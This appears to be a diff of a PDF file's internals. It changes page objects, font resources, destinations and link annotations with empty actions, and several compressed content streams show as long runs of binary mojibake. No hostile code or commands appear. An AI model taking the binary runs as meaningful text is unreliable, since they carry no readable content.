‹¬Ñw7è0ƒó˧ìù蛢#vö5ïõZ·â¥|9b/]¶7ÖBJè}Ò¡—~žƒ1Èœ¥Ìß‚øRjÞ´¶s>:Q~Žòx^¹­›Î€ò‘õ†#èBY -Êu7ú]3Tk~d ’@šÁMù˸¬ù»Ò½éù°*?^;T5doø1ï ¥Õc¼(Åz4 -ŒA@½Õ%¨ºî‘swÁÉïÂÏË°Ò¸~öä4#žRÖ=Æ%‡ ÌP¶•®Ü9©E>‰óæcÙ¶’¿#pŠ*ñêg¢ÍÙýYGÚ{ÂBŒvf—á#ÎðG:fx_L|ZÁ ‰F¡Ÿ©È0¨fðŠ‹ù¿šz5t¨? -Igyì^´Õ™Oƒém?á@3Lü0ýDîu;á_¤–0;ú—ÝæÖýdÐ2ê™ß!SÀ(ZP°€žû¾\R)„#r -8ê9̪ÜÂÖ”-4ìQEÎG±Âpöú©Ü V£nÄ“±ÆÂé¨yI ££G&®p"ÐêN(ˆ¯£Hö¬Ä‰&Š‘0 ™{\,«²^óòýÏßó¢¬ÿgVÒŒkؽë¸PÃßÎØ®4ng„·;ð²l;Xhmâêö®6F[ªöL Ê—Œ¿Tÿ”Î_²á1&ÎêÝ…ø¨tãÒŸ®×’ëéJ+UoÉ {Ü -œƒââž»d%MçþõæIïÛÊWÕõD¥™‡‰säd -Œ’Äü4›Ê“‰¯ò1µ‚ @üCeb5ó3ì©PGE¡Þ^(Ôà>ðR}Né渱8sw¤0Æ>A"NÀr;(^tÿÞ÷ý£±N?š¥È ùŽ)C'ÖšN[ʵtt€^zË›ïËzxâå/K¬Çµ}ä¾ -D’ îjÛ™¶\3änižª^dA·mU®àá« à -wuS5Ûƒ¼ÿîÛw¼€T駯™á¯Z½ÂDxðbê¥^}ôL-}óõïoù¶8Bÿþ¥#ø#BŠç¾ßín÷û[•`Äû»Ù·?Évcìj7*NlÆ2Ü)[ñgQ”\3Ò´NÎÊÔ[ŒW2؆a’}pÉÙgJŸ÷ Y‹Â¹eû-"Å4ÊÎ#Ï‘c}¬S¿“Ü%OÊêóŸUíîé©œ ûÌ@*l1ÿâ ûÅTÛù“®÷+LØYèZGÞPaÂEoÌk,ˆÐB`ë©Ç*¤Ñg½®·îJµ*mÐã"XØÞŠuq‹Ö=9?<#3˃<â ˜ô?’íŒ9.ÁT“âù›±Ã+|6U?©QÁl ­,µ …ôEqQ ÒÔ²`òºÓ+Kƒ2žmäöNpD:s3Ci³ ³ãA^nQjÀ „²cl3ÒÚsîzC³«‘;ÔlLˆèZœTæzÜ袃QÑi¢dˆ ¨è ›ËEÍ'r–ÂuüL1pLs8uK“‚¸2ªè´I!”²—í„PºÚ6Pâw{©ÜX•÷Ò{™± v—kÜT=ç!/NiÉâ4f4Ñ‹\†#BFÿAXÝXY4ãyÀm¹qäP§º.‡rYCèDÐ’ÑÂÿgÈuù§…±j¹ER.©kÁ=éxõ7¡°‡¡ª¡ò-Ë -I&zÒûÄ®3»hÇ H§ãÞPyoè™Íç9% ü<‡=§(|hçþ ‘ŽÚýa!>=Àø²žšF<•$~–fχ¬È4•|c*É2{Žó.´qF9½ - xø}ÄfN d -Øïx禙X¢Á%ß?kžY¯‡ß5Í(öü^N3<¥ O3ù8ÍDó‡œål–éø€²ÞÕGŽÆS]Êûr‘ü†NXypbÆ4‹;QžJ\*Ádåîo…šÂ$…Ð-×ãø¬9ÅA»?câ"i4”€ ‡Þ¸É`ü¶ÆÞ~½7ºîïU£3ÉüÒðŸø™?{t(Q<8 9kêèfÀ›a€-÷¦ä®×ÇýÓFdybjRx³¸ú?ìñ -endstream -endobj -690 0 obj << -/Type /Page -/Contents 691 0 R -/Resources 689 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 680 0 R -/Annots [ 681 0 R 682 0 R 683 0 R 688 0 R ] +/Parent 647 0 R +/Annots [ 681 0 R 682 0 R 683 0 R 684 0 R 685 0 R 686 0 R 687 0 R 707 0 R 688 0 R 689 0 R 690 0 R 691 0 R 708 0 R 692 0 R 693 0 R 709 0 R 694 0 R 695 0 R 696 0 R 697 0 R 698 0 R 710 0 R 699 0 R 700 0 R 701 0 R 702 0 R ] >> endobj 681 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [457.668 747.553 501.712 758.344] -/Subtype/Link/A<> +/Rect [387.368 689.189 540.996 699.994] +/Subtype/Link/A<> >> endobj 682 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [93.691 733.925 129.327 744.715] -/Subtype/Link/A<> +/Rect [428.893 640.939 479.635 651.744] +/Subtype/Link/A<> >> endobj 683 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [293.974 733.925 364.609 744.715] -/Subtype/Link/A<> +/Rect [440.276 585.326 534.779 596.131] +/Subtype/Link/A<> +>> endobj +684 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [236.095 495.636 293.592 507.589] +/Subtype/Link/A<> +>> endobj +685 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [295.435 495.636 328.775 507.589] +/Subtype/Link/A<> +>> endobj +686 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [397.913 495.636 423.256 507.589] +/Subtype/Link/A<> +>> endobj +687 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [451.259 461.568 540.996 472.373] +/Subtype/Link/A<> +>> endobj +707 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 447.939 117.823 458.73] +/Subtype/Link/A<> >> endobj 688 0 obj << /Type /Annot /Border[0 0 0]/H/I/C[0 1 1] -/Rect [474.511 542.357 540.996 553.148] -/Subtype/Link/A<> ->> endobj -692 0 obj << -/D [690 0 R /XYZ 72 793.935 null] ->> endobj -142 0 obj << -/D [690 0 R /XYZ 72 619.743 null] ->> endobj -146 0 obj << -/D [690 0 R /XYZ 72 204.966 null] ->> endobj -150 0 obj << -/D [690 0 R /XYZ 72 116.575 null] +/Rect [141.588 447.939 259.615 458.73] +/Subtype/Link/A<> >> endobj 689 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [186.613 392.326 223.881 403.131] +/Subtype/Link/A<> >> endobj -695 0 obj << -/Length 1953 -/Filter /FlateDecode ->> -stream -xÚ­XmÛ6 þ~¿Â(,Ç/²c0 ÛÐn-¶u]³Om1èl%Öæ·ÚJÓûñ#EÚ‰ï|]{ë—H¦(’"’Rr$ڧɋR&‹ïODÎÕNÊáxf\öê9~™CK£A{žb<¢–þS!2¤žêÒ I‡ÀÝ^ÆË®k*šµ]ƒ{ š6˜òáD eÃý(«SûC)êCÛ)ˆ¸ä~(%Ÿ ¥>kZõŸ@ÚûæÀ±M!kš  (NeI´¢é­`ÚÊ®·g†9û8ñôÂÁ@ðŽ£6Í{Ž™cPè£ØÏQΪ Ôð+Q„ˆ´e W×’Q6Ql -ÝOL°›Nhrs°0[…žp=?–ÉL•kšH@¡ -Êå[,ŸLÑð†s¬¡Â]Äš€ÉXå)Î{Èìwe%[·=Âgǵ©ÚõQÝô™ìä ˆX/”ƒ÷ªëmœú5ï à~óèyÇãÿÛ7~(\Ì?,4Æ~á2„úŸZ™šnlNÂñ}7¢ÀÂ}°ö¤Éx˜ã îYý—õÿ¬âÐ?{ô䆡ƒ=« Âi“0@`‘û>}p(af# |·ð+ÇBgˆ™‚ ­d¥ Öýt£¡ö@‚>õ(Ù›l´”zc36èñlv©•˜e#s–Œ}w¦°VæñnAµ ?iÙ!¦™Ê•ð - çfT÷Š›‹·5Þd[ Þp eîá¹P†C7Æ)õ òÕK´éçáÞq>$ò+re­á:ô±‚ŽHp}®÷ÛeA3ò¦Dœq1¢$Ä\Hû‚-¿ýÔ^QÄQÄÐÕmºÑ⣧)V뻚}H_/ˆÕ?>ÙÎè<7 Gž3ÏŒ"7…{=óþöâÕ¬À깘¸Š< sWt’ºA»~hš¿õ\3 c8Ñ(¼P2Ç.†./±ƒK=è²{BnN3á^u«ïöª63º£‚“ÞÑyCCÀ 4~Ú"."‘ŸjYé ®3˜ˆ´HvÁâ«—?åÑVØÑŽˆ¬ÔN]âö lp‚Eâ-n†·’…-¿o½b4ä3Î+I7=€Ë‰ZŸiâ„sÁÂ&”ÝAœPbâdŒè9;,ý„¢¡¥ÚzàÔh¸!Ê€\+«aQÜ}º`‚ß*f hãÝ‚#ÔJ²(…È`¡ÅOÍMgr© ÿ[³Ê[¡˜©‚¬sò>áW_G–!ÅFm¶Ùb}¹Y ã/Öä[îŸ^♋À`¤œ©1<ŠÓxÌi¼ÈÂoß):)\W¸#G3ù¯|!Æt[~Ðmcå© ¯Ì‡Ü74>*Œi¯×k¸~ìXàõCM¸[·{˜¬ÁÂ?umܶh¿Õù7pƒ )Àûž¦> xå°nM]áh!x)K8éÔù#Ê"f›G±×Eq]U×"yK̯Ÿý -Jž¾àO„‹íyøA¯$Â’]lp„K°¾¥ù¡+Çx_õ9úôŽ‰ƒ|”i5b±ŽÆž¨ÓÇÑþQ3Iûå‘9ù]ÿ“Òy“XitKé$Í»ƾݱ§[Ê×:ÿzªš«ÃtÃéwº«Fõð˜2.o_\ûä3:ÄÐ1ñ.$Û~.¨f€îG ºÔ->_w}¨à=”­ðøÉd‹ÑžðÒ’è^K³÷ó°Pÿ{ì»æÚóéÁŸµtˆá—H:{ãaSàò'R}Æ…®[6?@õP·îJ -¤à¿¤ÐpÙÞ]#ç´»®ûv¶=Ù^ý G J -endstream -endobj -694 0 obj << -/Type /Page -/Contents 695 0 R -/Resources 693 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 680 0 R +690 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 378.697 217.481 389.488] +/Subtype/Link/A<> >> endobj -696 0 obj << -/D [694 0 R /XYZ 72 793.935 null] ->> endobj -154 0 obj << -/D [694 0 R /XYZ 72 720.983 null] ->> endobj -158 0 obj << -/D [694 0 R /XYZ 72 630.656 null] ->> endobj -162 0 obj << -/D [694 0 R /XYZ 72 493.894 null] ->> endobj -166 0 obj << -/D [694 0 R /XYZ 72 420.126 null] ->> endobj -693 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F22 421 0 R /F26 513 0 R /F24 512 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -699 0 obj << -/Length 1889 -/Filter /FlateDecode ->> -stream -xÚ½YëoÛ6ÿž¿B†U"š”¨W¶nh±>2¬m¶z†¶™¶µZHrRÿ÷;òHYvÔ,Mº}‰Húx÷»¼ u–u^]1øR‡9±ïÄ)%,M¬8z÷:sXÿÙ¡„§‰s­© -‡G |×ÎÛ£_žÎŽ¦Ï}æ¤$üÈ™-G@Ò tfsç’‰—¤Üý½K9ù0ûyúœ…z&„r`¨©ýT‘QÍñÌÏç)½iN&^n¾P_în'~âV\¼VQNüØíp¥«ð[7•úí*ŸKÜWL˜[5fÒ­`“¦«Ji6ˆF²“VÞ¢j6/ÛN”™„ý§{€?÷#ENJG\)ís’ÒØñà¤>jõÍÄ ýЭ·Ýª*qÜÿËu!jRoqÅÛà÷xÕuõétÊbŸ°ˆø, @Ë6mõ†i½„Át)»¿ò²#õªþ1Ÿ?fßf¢{ì+Üõ®ÃÏ{p¥ ø†3ßñ˜^›W±°ÿ$ŸøÑ @–‚N! ý÷ý9I‚Þ1™µ¯X·Æ#l;´hU®·fme¬ÿr6;GA¾?ÄxJ(D¨‰˜ß[ÙxO–²ìF@…!‰³¤+)æ²!ZIϧœÄ ÔLHGHðì“(êµ´Q`Ð à ÓÈò}µ}ûë/@ º†„’(A‡„%ýŽN4àš{…ŽÇÀ×qšà þ‹à)¶*x6⯶kTì›ýW8_0å¡Üc£ÎÛ-#•’Ä0¦!]"D‰¿’¶Ú4™„¸”¤”аcô¤¯ÎTbùnµ:-ŠSN? Çw<~¿½>{ý¬è(ÓAq±63sâX6¸òh÷®l+cGÈ':—0wŽ y‹ß²2ªÁÙ«ä½òg3œîÛìè³×@ûü͇м\â$«ÊRf]nbø@-a8Þ4ë‡ÊS™vO ÅSK´:£Opr-r#[àg¡,zm(% Ÿ··AbãŒÐð@è'~'N£Ê R‰V­Oÿ&v¿?Âàî|[Š"Ïî¡Xb‘7E.¡nŒ²›=(ÿ‚gç‹ûãÙ7ÁˆH ·ÂC¤îyλ=<ïBœ»6Ôo…È÷­ò@(å¦MžM7¥l3Q˹1óXø`·‡Ïÿë™>õ -ñP'kì§é>þëO[øc³ê%oªNŽøuÄ|*óÿ{Àù™?jq |£(Œ4¯Á`ÿÎ`@Õ!Œ€Ãhà>Á¬ÛÐËX©¯U‹Êî?Ázv±Y¯AŸ-ÎÚM š©&EÓ©Wm€‚› B©©€´¦mä~Í6ç{¥1I9ß/ÁßSîúI‚ýJö ’Cõ Å~x o‘át'ü"Îu7¨í–ü¯µy•gMÕV ã0l¨$<Õ€2÷]²‡Ž9Ó¡–èË[}M€´m®/8µ¤Wð]˜C¯–Vf rŒ¥x ‘Õ¿»~Lĺ‘b¾ÅÉDzR¸® ½ÐV–¹°+ºèÆñu¡Œ«óeö0ÞÓ€—KÙÔðòèÏÚÓ­ÆŒn¥¾+?e²Æוšbc ¶•C¡O«Z¦=Aod¼ÿƒÔtúà'ÓM‚Ôçˆ+_˜„ƒ+7šPÀA|æÎt»Êˆ×­BmÈÜ1}+ÍC{ F™B°Rôèã˜Ò;wpÛã‡ÝHXPMEðÔXË‹ÆÄ¢§BsxŒqh©¾a“˜÷³+Ô}ŒQD"Úù#Ù1¸¢z@U3.Ë49)êì/Å·ê]À–Œ¦$Ùõ謹M£=F*‰óн^ÉFŽq á9Àú<·A 1£$dñÝ­#›¾¤jÓ„&ûw5 áÉ£. »p 1 {Ù}¿•ëŒòÝÁ}£{Ä¿qJâ°·ihß4ûÐSBi=[{ÌAª:æ#ne$ñwÿ 4aYÕ¢›Ì‡I™&eeÛN9Hñ¿Jø\½¶v—Ž~i%$ c¸SJ8¿S/øÙìè-ÿ¬Ý -endstream -endobj -698 0 obj << -/Type /Page -/Contents 699 0 R -/Resources 697 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 680 0 R ->> endobj -700 0 obj << -/D [698 0 R /XYZ 72 793.935 null] ->> endobj -170 0 obj << -/D [698 0 R /XYZ 72 317.199 null] ->> endobj -697 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F14 522 0 R /F11 701 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -704 0 obj << -/Length 2266 -/Filter /FlateDecode ->> -stream -xÚíX[sÛ:~ϯðtÚ‰²s¬ˆ"uËNf'm“6gÒkÜ9i¦#Ër¬­,©Äÿ~’,GÛ휽<í‹ ‚ ‚À -ÎänâLÞü8ðïLÄ$p'AäØ"Š&ÉúàæÖ™,€ÿûıUNŒÔz¢üþóÉõÁ§ƒ—³ƒã WL";ò]2[’iGқ̓˳¦a¤¬/M|—ÝÎ~?¾ÞŽ¼òBÛQ ÐHKE6í_ýÃÞþ$]¾B]S%¥-¤DÂV*"ϦžëYÕV¯Ê‚èæHX?òu\ÙÕ–8Ó ý?[i]‹Àµ…o»‚°ÇYp\Ýq|—êoY¡íjUý-[œŠg¬Dï‰téï« -'VÂL… ¾”dØtº˜¯Þ÷cÙè»:½ Ÿ®ž™%S^ã*; -}ZscÛö­™u†ÊnV«“õúDŠ[Rxóúü%èúò†ÇÍ÷¬ª²âŽFºäÿ´ÑD-A¸¬‰~·½þtõßÞäC'y:¶ËC:gui}Ÿqe•UZǺÓÝl®Ohp•›G"¿Ìa‹M¡ù:C[8|Žç\ºN«lAœËyú\10Aí™WUž%°1…Ž‚Ã$«¢ÌË»-oþñíG"<ÛµýßHꬊ“UÊ‘ühìœó8ù>M 6çõËw× Òu¢Èjƒna/cL<8üC愬ëÌsýÈJâ¶uÇÚ¹¡Unˆ]Õ%ï³ç ëîh Áô.§Ó%x9­+p¼° ÈGLÛ÷Ýv….!VxQ¸ÕC¦W#{øŽ¸a¿‰ ý§š¥°eàµbàM7t-J½V}žÓË"ßòéPÌJëeY¯‰£ÑùH¤:-šìþÈ ,f}u¤¢f:ES²¹ -ÜéxpEÒö]ÆŽ%F«”’J©¬7]I†zÒM/bÏëQfvkˆÄ´À5 QÌþFƒ:y휬ÏÍ =†nßå¦&ך]RgycwÁÚAÀÀð¾Ôx>ÏScÝRYƒ$]EŒÜŒý>€má;êb (Çn]D¶#»+„C©ËzKZcŒcÜ*ƒck&škt]w9KÖiR®×÷é‚Í,éÓ`Äñ)2=b¥ëJÛ\g8ÂÐÊ–ø@ÐK—‚˜q21oÊ|£S6W-•²=7^u³©Çê$[Ø9¦»*7p@åxÊQ˜Êx{œÎ8ÕGŽ8"R8ãp€òè{¡u¹$f—µFGIÿxf›ïE‰ñô@£LC,)WZyÊóm¢à¢x£Ë5Wçí¹é,ƒS MÙrKA–é½d“ì‘û€”zm¥W¶„*².Ž">Á„Ûì y£Þ+pkšxä¢K8 -ÌtÀ¿?_Äë±+«\@4‡øÁÄþÉ&Éô˜TŽ!Ò”¥Ùöå ÈÈe¼ÉÑtßé¼Cï›iÈÞ4Ñ Í“G€û`iNƒjsÈ‚ÃÈ2{ö>„%û‘…|¬…Ó.vî}‘Öù–êGííî8ÚµV ß¸¼Nl œ܃‰9©¸è ‘Q Èå¦HðDq¡e$@ÂÞ‹„uÖÂ#Èq¸ÖºÜ9N=¨‰œ‰Öm*²¹¬Ñ˜‘>9S‡À <`¤k^Tv2x~B$¨]üƒº«Ô°î~uD°¿f7z’m„]QÁ·ÊOv™Ò’© •Pb—?²bAµ¤éÒþé{!rË@48ƒÙ4ÙÇò·¥™ÔŒAšµ•í–qËi_ÀåWPøä¤ùθa‡øúÁü_LøøÁXÅ”Nȹ Ä®g×`ô×€×AЛbÂ`ü$Ý;y€%}Sa‘٢ٳ¤Sa‘0ÁHÏ0a…¥¢C Îoª®Ü L*{¸°àWà^‰•ƒü¼Ä:¢/²Š‹ì«M›!*DÅßÓ„¢9UŒW»…g%T£ÅOÊd¸[&›±:©„íy~_'«:]f£ó¶ð: ª ’Bú;E·‚oqmSáø¶ùJyô_:ʇ·N‰£|ÏJððæk%Á¿u£ã"Iš¤'Èßoò¢ÃÀŽ«¸ÒX¥P.kˆ>Vy™é^Žr)Ì™ÊMÓ®Þù¾b=1︪”y}Isüð+^1W7Nzób(÷^ÙÎ}î‹k^Æ ,®@ŸmÆ7Ab>Gâ:c=PÓM$• “„{üöHŒ‹‘ZÁ]ò“.¿á¬d±L7i¾ì´ƒqt‘ÏdÔa–¹1¥œ¾àìwœ,ÚêeX„Î( /šåš­4VÄÄ3€Šr¦”ÇÝS[`¢=Áx_#.£öÆY²µ¿½ g˜YÈi=H/2@gƒÌvìû¸èÞ 1=:voëo{̨S”c[°†Ô°¶qŽœ?ÆëÊÔñ ²L À##èâ ;ô»Ì¦¾à8ŸøÁا¿²Ñ­Ðq}‡08ÜÇ +ì÷Š# ç¨Fì^$øR‘DO›èà :¶ -º‚ûœ×açä”[h×çWç¯f4ø ý]|þðŽ(ÊUÜ€*šðméùà ýãíùçsϧØ1:äÆd”€¡õüÛ›óÙÍa†š‡·;“€ÇÏM;‰ZR—ï.QhFý iî a³PXýÖôìÀï '¿Ô Ýﺮw*€ðáþgz  +úèzÛö@á¡òm^ÇÉ÷T7Ü ѾÊÍPù ÍЊ7Ïíb¨3ˆYXhê°Ÿá¢Aü³÷¯Éµ‡Øj<<5¾‡*ü¶½yù ¸øpÛ÷1ûäœ#¥OdÓ§d÷Bœ°Ïû:ƒÃÃlqH’¦QfxN'™ˆÅôàüw¬Køi°k âq~ÉÆ‘®è fŸAéÙÅÅå+îé~™ñÔÛٌۢüÅx2v¤Î€>²þypŠnðÂ^¸Îžþ5’ò 9£ys>;øo³}ˆ -endstream -endobj -703 0 obj << -/Type /Page -/Contents 704 0 R -/Resources 702 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 680 0 R ->> endobj -705 0 obj << -/D [703 0 R /XYZ 72 793.935 null] ->> endobj -174 0 obj << -/D [703 0 R /XYZ 72 547.034 null] ->> endobj -178 0 obj << -/D [703 0 R /XYZ 72 319.654 null] ->> endobj -702 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R /F14 522 0 R >> -/ProcSet [ /PDF /Text ] +691 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [502.621 336.713 540.996 347.517] +/Subtype/Link/A<> >> endobj 708 0 obj << -/Length 2386 -/Filter /FlateDecode ->> -stream -xÚ­ÙrÛ8òÝ_¡šÚ”©¬E¼™-×V&cO<•kb¥ö!ãš‚EXâ„W2Žþ~ºÑ Š²•Ì^/$Ðhô…¾o¶™y³ŸO>Ÿø{31KüY’y®È²Ùº:ùxãÍr€ÿ2óÜ0Kg÷«š…q -ÿrv}òëÉ«“å¥/f™›Å~<[ÝÀÍ‚h¶ÊgÈ/Ò,t>h¹Qó›Õ/ËKMðÃ(u½ì@ ʉǢíx–n"î" WÜ0ÌhÏ?}â'½Ò=üÎÍp.ÝÏ‘9/W«wKáº@s!|P& Ï×kÕö‹õVvZõÏpCè\]¿]¤i”-Dt6ôw‹ôŸÏ=79{Jÿct^6švGŽH|WÄ®/@”õ{|KYo° -3VõbÐgª6|¢oïcN½úÚ/¿VÀ§<“m[kÙM  óm_•(`ž™M0L2š·¥,ˆkzvŒmQ˶ޜ=]>ý¶t´ê€Y[ õgäYÉv ” ô›yÛ¾oŸ-—° -K®n†n­îšn£\À®U8‡V ‰þ‹¦®Õubúë²ÁƒVÇ„ùèºîÍÑ…íöYU=É ùxõ樼åéÏ+´²“•êUGÓÓ"?¥c*4stßT4.ê?@2y[~_–®¿ðC7óø'n–Å|Æ@>g7÷§h²–5 ´Rg4귊ĬBÓVâÆ]ÙÈœ`ZÞRÔ›h8ªq„T¡ŸDã·þ¢tÔ*vÓX° åç"ó‰Ÿ=ñ½ço~‚/=x>ÇÏ<ËÈeº„˜Üo‹õÜO-‰ÿáý+R1Wëf˜0È R ßÌÂùßÜëwj×ø(CÎ2jx§88EÝNÏOÿeͧZÉO¨ªÒ¤Ðè ŸÕíØWv5ºBi`-K ÅyÓupÎìÍj1OÜh]`n–zæQ‘É2 ®˜j’piD€$Ì}Þ~¨é´·Œáž s½(“{yoª ~vúHúbW‹ÝBŒ¡„L~ŽÙ ‚Ø£Ã0¼Ç,‚àv¼VÈ" ÒLd±…æ@_¸išZË[ECyR -+†äX~18-1–ˆXQ4v -jÔ)ù¥•»'ºGmç{©›z£0¨ì‘‚F £èðhŒà™m>2ÿ .ª€FÏó}gEÞ•Ù ^C ΂ ^£ƒl ÌGÌ :ÁÌŸø]ªp‚‚=”²£ ”n8Z õ‹e¸FGÊ°AÖªl?”q´”ÔGCŽ -h–:¤@b¢Œ äï)ð7fÁ1€DHmêŽ6ôæ¼&øäP´Hb¤Ö˜Àæ7/VÞ~N+t¿‚Á䪌$dmÉRÇA(‹œyj¼Êà21ªÐGëᾘ‚š -±/äTûq™o/‚Ëw2)P¸Lµ—IA1-ʾïPˆêp6µTÃÇeÆH*· ÍÝŽùm1nÈ—ˆ§³jŽR„£ÃipöîCí1¸ÊH-Ç®™–#NÁV0ãkc4é œ\õL‚‡%ðÑ0LmœÀ‚é¤uûýM“:IÓ£­Æ[C&6 $'…© 1´æ6n7|;éRR\s·oß1öádí°}Æ7V<´†Ù_o¹•Ãµræ…úDÁjåÁÖšï°tÁ܈ÅRºU=Èfqèúb̾¯wt¿.#ž'GR[¹Éþ´—ÝFõù˜)Ë€iI‚…GíªN2ÜÄiÁ¤X× -¶å´”¬™qç=Ç5U„É»—ïŒyà°@?x¡†zì×\m°Bîk6ÎöÁïa}nŒ&ù¯Þ! `¸a’¾Eýø wDÛš—JðazŽlwY ôÿ_+ÇwÝ_)E øýrYí`°„Óú½¨ûß¹—uÛmûÏ"?GÔøQB¡1Zæ†Â?| \|!zV]0>@ØדÇÏ™áÁsfäíŸ3é¥}ÎßüÌcÊ1„Í›KW¾ijó†É¯"÷²à7tI¿;¼BÜ3¦qýÖ½H«÷°ñùååÕ ¼ý°ºÙ?ÎÓˆ/aÇOùbuò'9l< -endstream -endobj -707 0 obj << -/Type /Page -/Contents 708 0 R -/Resources 706 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 710 0 R +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 323.084 188.817 333.875] +/Subtype/Link/A<> +>> endobj +692 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [307.122 323.084 382.626 333.875] +/Subtype/Link/A<> +>> endobj +693 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [500.887 302.092 540.996 312.896] +/Subtype/Link/A<> >> endobj 709 0 obj << -/D [707 0 R /XYZ 72 793.935 null] +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 288.463 116.495 298.518] +/Subtype/Link/A<> >> endobj -182 0 obj << -/D [707 0 R /XYZ 72 403.612 null] +694 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [342.199 226.584 387.076 237.375] +/Subtype/Link/A<> +>> endobj +695 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [189.398 177.781 226.666 189.733] +/Subtype/Link/A<> +>> endobj +696 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [288.096 177.781 313.44 189.733] +/Subtype/Link/A<> +>> endobj +697 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [322.438 177.781 372.876 189.733] +/Subtype/Link/A<> +>> endobj +698 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [512.997 164.705 540.996 175.496] +/Subtype/Link/A<> +>> endobj +710 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [95.91 151.076 134.728 161.132] +/Subtype/Link/A<> +>> endobj +699 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [192.103 130.084 229.372 140.889] +/Subtype/Link/A<> +>> endobj +700 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [274.422 116.455 445.227 127.246] +/Subtype/Link/A<> +>> endobj +701 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [276.448 81.834 310.894 92.639] +/Subtype/Link/A<> +>> endobj +702 0 obj << +/Type /Annot +/Border[0 0 0]/H/I/C[0 1 1] +/Rect [324.043 81.834 427.351 92.639] +/Subtype/Link/A<> >> endobj 706 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R /F22 421 0 R >> -/ProcSet [ /PDF /Text ] +/D [704 0 R /XYZ 71 806.89 null] >> endobj -713 0 obj << -/Length 774 -/Filter /FlateDecode ->> -stream -xÚíW[oÚ0~çWX}i±ãÜHeê^Ö­tiC—DËÄiÇ¿ßqX;MZw{àÛÇßùüû“PÑ -©è²µnQUDQWC]GÅÔq·¦3ù¿A*6=U¨– c„Æ­ûÖ©Û"C";–f!÷ArèØÑMäúhÚ6qG±£=)+Ö™¹7dHÍgxô±ja…Ö5i©µ4චXËXÅÐuLu]L°a82çòÂí(¦f¶I±ŽâEFâMÑ¡íuDVŒÏÄÏsö³"ÀY½ ýc*áW®;"”ŠCá@…jP©.i¯Ò‚÷$’v5L-¬QÀ -øIÁrjL¶Y ðBŠmú¬šjÀyÖ#µV\¤e4_1¡$a0ügi’0‡iRó{Q -Û‚5;¶%ÁÓ èÅqÏTg;u?žx8¼>“ë³ï]3hQ–&À+£’z÷Nî(rÐTUˆë5©;_pVëæáÉ¡™2rSF;†ºÔèiè“«KÐöÞ}ÁkHÞ1ËY^3Ÿd /`ÀÖž÷t²,^V«b£«1b(Z)¶ £„µÜ| -y gã2H‹0QF îÕ¡8õÉM=Û>Tºï¡ÞM܆—º.™p§…7Üï†ô»¡ñ*7¤{ÝP?¸áÏÜ°r«[–¬xP»µè«ó`ƒ¿ÓéÁÿ… vÿ¶ êüïlp÷§j;^¸­oG®© -endstream -endobj -712 0 obj << -/Type /Page -/Contents 713 0 R -/Resources 711 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 710 0 R +58 0 obj << +/D [704 0 R /XYZ 72 760.449 null] >> endobj -714 0 obj << -/D [712 0 R /XYZ 72 793.935 null] ->> endobj -711 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F26 513 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -717 0 obj << -/Length 1842 -/Filter /FlateDecode ->> -stream -xÚíXYoÜ8~÷¯Œ¬ÒlÔex<Èì$™ 29œ ÇÈ-v·fuE¢b÷¿Ÿ"«¨VÛò®'ÉÎSlñ(²>ÖÅíX˱^}:ráëX®yV”8ÌMkU]^9Vã¿ZãIlÝh©Òâa ßÂzôîè§åÑâ¹çZ KB/´–kÜÃg‰XË̺´6›Ç ·?téFÌ®–¿.ž»ÁHž1s8l¨¥}_‰9 ö­dC®dçÜ÷™ëûªÁ8OpÍ?ëª+™×Õélx½*ê™kwZl3w=ÀïÂRTr¾Ü5‚Ä%‹[¹Øʲ0K<Î’8Ä%gjâüìºÎvçS[ž]Ÿ¿÷ 